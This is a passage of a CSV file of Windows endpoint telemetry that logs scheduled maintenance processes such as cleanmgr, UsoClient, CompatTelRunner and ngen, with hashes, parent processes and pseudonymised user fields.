01:03:43.137573400+00:00,b4f30133-a5ce-4dfe-ab64-19ebf56e2b18,computerpii_0a470890c60768167990033d701e7bd881398861,156027,False,10.7740.19041.1052,False,11540474045136925,,11540474045172048,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,DiskSnapshot.exe,DiskSnapshot.exe,DiskSnapshot.exe
+84,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.454774300+00:00,648,dstokenclean.exe,dstokenclean.exe,PortableExecutable,2020-10-09 20:46:58.338966200+00:00,C:\Windows\System32\dstokenclean.exe,13312,79546c85ee91f2aec0b1bc79b07ab154,cd3bd705613b8cd0f25159b32adf38f73fd0b5bb9f384c08bde8214509e0d716,494f1d9531606c7f7df71a95b8963d15b4376aeb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.472639200+00:00,2021-06-23 01:03:43.137661100+00:00,c2e3c29d-c3d0-4ee3-b41f-c8cf42107e31,computerpii_0a470890c60768167990033d701e7bd881398861,156028,False,10.7740.19041.1052,False,11540474045136925,,11540474045172049,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.84,Data Sharing Service Maintenance Driver,dstokenclean.exe,Data Sharing Service Maintenance Driver
+85,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.462773700+00:00,20388,UsoClient.exe,usoclient.exe StartMaintenanceWork,PortableExecutable,2021-04-14 01:10:15.165138700+00:00,C:\Windows\System32\UsoClient.exe,89600,cb83db7acb08ccd0370200eed9a1803b,278567a8a88fb508453c6e415eba46e1d23a419fc2d09992df95883c9f37cebb,76996171bfcbdfad71405cf376b1cd045a2fbb2e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.505396+00:00,2021-06-23 01:03:43.137913400+00:00,5fb8793b-e430-40ac-be39-a45568827bc1,computerpii_0a470890c60768167990033d701e7bd881398861,156031,False,10.7740.19041.1052,False,11540474045136925,,11540474045172051,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,UsoClient,UsoClient,UsoClient
+86,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.465665100+00:00,19316,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd450157fcc92c0a80ec3cf22ab5e4b3,2af7212a150b721d0105928864df0049a4d959ad7b5b997df47ba69b434404b3,394166fe3140a310371df5d58e95c0ad86706876,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.446512700+00:00,15664,DiskSnapshot.exe,disksnapshot.exe -z,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.506020900+00:00,2021-06-23 01:03:43.138000200+00:00,79a42d86-f5c3-464b-bed7-9982f64e2e5f,computerpii_0a470890c60768167990033d701e7bd881398861,156032,False,10.7740.19041.1052,False,11540474045172048,,11540474045172052,2021-06-23 01:00:55.446512700+00:00,15664,2021-06-23 01:00:55.446512700+00:00,\Device\HarddiskVolume3\Windows\System32\DiskSnapshot.exe,15664,128,ActiveProcessStartkey,C:\Windows\System32,84480,2075-04-18 11:44:27+00:00,2019-12-07 09:08:37.284740+00:00,2021-06-23 01:00:55.438681400+00:00,2019-12-07 09:08:37.284740+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,DiskSnapshot.exe,DiskSnapshot.exe,DiskSnapshot.exe,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+87,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 01:00:55.474643400+00:00,7680,cleanmgr.exe,cleanmgr.exe /autoclean /d C:,PortableExecutable,2021-04-14 01:10:31.033943500+00:00,C:\Windows\System32\cleanmgr.exe,320000,ef759fbf8aee871c4accac4a2ef8f9ee,87d5153bec20f9b2e61fb6c6e4f0e49e48ae50691912ce793a599299d31ef671,c94b3634bbf439181de566c1837969daa7b26f70,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.509220800+00:00,2021-06-23 01:03:43.138089200+00:00,d8226f1e-dfd5-4975-a490-b001a9dd0a43,computerpii_0a470890c60768167990033d701e7bd881398861,156033,False,10.7740.19041.1052,False,11540474045136925,,11540474045172053,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102296,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,CLEANMGR,CLEANMGR.DLL,Disk Space Cleanup Manager for Windows
+88,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.488324100+00:00,8404,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,79546c85ee91f2aec0b1bc79b07ab154,cd3bd705613b8cd0f25159b32adf38f73fd0b5bb9f384c08bde8214509e0d716,494f1d9531606c7f7df71a95b8963d15b4376aeb,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.454774300+00:00,648,dstokenclean.exe,dstokenclean.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.510854300+00:00,2021-06-23 01:03:43.138176100+00:00,4fe26e2c-d144-495b-b729-c63488624809,computerpii_0a470890c60768167990033d701e7bd881398861,156034,False,10.7740.19041.1052,False,11540474045172049,,11540474045172054,2021-06-23 01:00:55.454774300+00:00,648,2021-06-23 01:00:55.454774300+00:00,\Device\HarddiskVolume3\Windows\System32\dstokenclean.exe,648,128,ActiveProcessStartkey,C:\Windows\System32,13312,1982-03-15 12:43:42+00:00,2020-10-09 20:46:58.338966200+00:00,2021-06-23 01:00:55.454310300+00:00,2020-10-09 20:46:58.338966200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.84,Data Sharing Service Maintenance Driver,dstokenclean.exe,Data Sharing Service Maintenance Driver,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+89,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.602606100+00:00,15676,CompatTelRunner.exe,CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings -cv:mtYj4+yahEiD8KAe.5,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.404476+00:00,10864,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.642105100+00:00,2021-06-23 01:03:43.138611900+00:00,cd99c96e-1b07-434b-86d4-f3a60abef9c6,computerpii_0a470890c60768167990033d701e7bd881398861,156039,False,10.7740.19041.1052,False,11540474045172041,,11540474045172056,2021-06-23 01:00:55.404476+00:00,10864,2021-06-23 01:00:55.404476+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,10864,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+90,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.753380700+00:00,9384,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1076",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.812924700+00:00,2021-06-23 01:03:43.138914100+00:00,f7928a66-85d3-4665-82f2-a0ba0488fdb4,computerpii_0a470890c60768167990033d701e7bd881398861,156042,False,10.7740.19041.1052,False,11540474045172035,,11540474045172058,2021-06-23 01:00:55.367532600+00:00,16324,2021-06-23 01:00:55.367532600+00:00,taskhostw.exe,16324,256,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-23 01:00:55.369684500+00:00,2021-04-14 01:10:22.932389100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+91,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.774130100+00:00,19536,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.753380700+00:00,9384,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1076",True,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.816309500+00:00,2021-06-23 01:03:43.139084600+00:00,b36dd38e-c7e9-414c-aead-bc8cec42c848,computerpii_0a470890c60768167990033d701e7bd881398861,156044,False,10.7740.19041.1052,False,11540474045172058,,11540474045172060,2021-06-23 01:00:55.753380700+00:00,9384,2021-06-23 01:00:55.753380700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,9384,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+92,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",PortableExecutable,2021-02-17 04:29:20.504956500+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,79312,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.819176400+00:00,2021-06-23 01:03:43.139265500+00:00,4ed5575d-7b63-4fa4-9eb5-3270c701eda7,computerpii_0a470890c60768167990033d701e7bd881398861,156046,False,10.7740.19041.1052,False,11540474045172035,,11540474045172059,2021-06-23 01:00:55.367532600+00:00,16324,2021-06-23 01:00:55.367532600+00:00,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,16324,128,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-23 01:00:55.369684500+00:00,2021-04-14 01:10:22.932389100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+93,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.831577600+00:00,7044,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.879892900+00:00,2021-06-23 01:03:43.139349400+00:00,928145a6-b9cf-4595-a6b8-bd858dbc55d6,computerpii_0a470890c60768167990033d701e7bd881398861,156047,False,10.7740.19041.1052,False,11540474045172059,,11540474045172062,2021-06-23 01:00:55.768853+00:00,13440,2021-06-23 01:00:55.768853+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,13440,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+94,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.841055700+00:00,11896,CompatTelRunner.exe,CompatTelRunner.exe -m:invagent.dll -f:RunUpdate -cv:mtYj4+yahEiD8KAe.6,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.404476+00:00,10864,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.881679800+00:00,2021-06-23 01:03:43.139438300+00:00,c26238ba-8cdf-4585-86f9-aac7fbb6cf9a,computerpii_0a470890c60768167990033d701e7bd881398861,156048,False,10.7740.19041.1052,False,11540474045172041,,11540474045172063,2021-06-23 01:00:55.404476+00:00,10864,2021-06-23 01:00:55.404476+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,10864,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+95,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.014930300+00:00,11492,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.753380700+00:00,9384,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1076",True,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.155911800+00:00,2021-06-23 01:03:43.140249700+00:00,80abc90e-e530-4719-a3b6-86d2c69f4e19,computerpii_0a470890c60768167990033d701e7bd881398861,156057,False,10.7740.19041.1052,False,11540474045172058,,11540474045172064,2021-06-23 01:00:55.753380700+00:00,9384,2021-06-23 01:00:55.753380700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,9384,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+96,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.039912400+00:00,3768,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.168731300+00:00,2021-06-23 01:03:43.140359300+00:00,62548b72-dfc9-4e5d-9e29-a90715d194e0,computerpii_0a470890c60768167990033d701e7bd881398861,156058,False,10.7740.19041.1052,False,11540474045172059,,11540474045172065,2021-06-23 01:00:55.768853+00:00,13440,2021-06-23 01:00:55.768853+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,13440,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
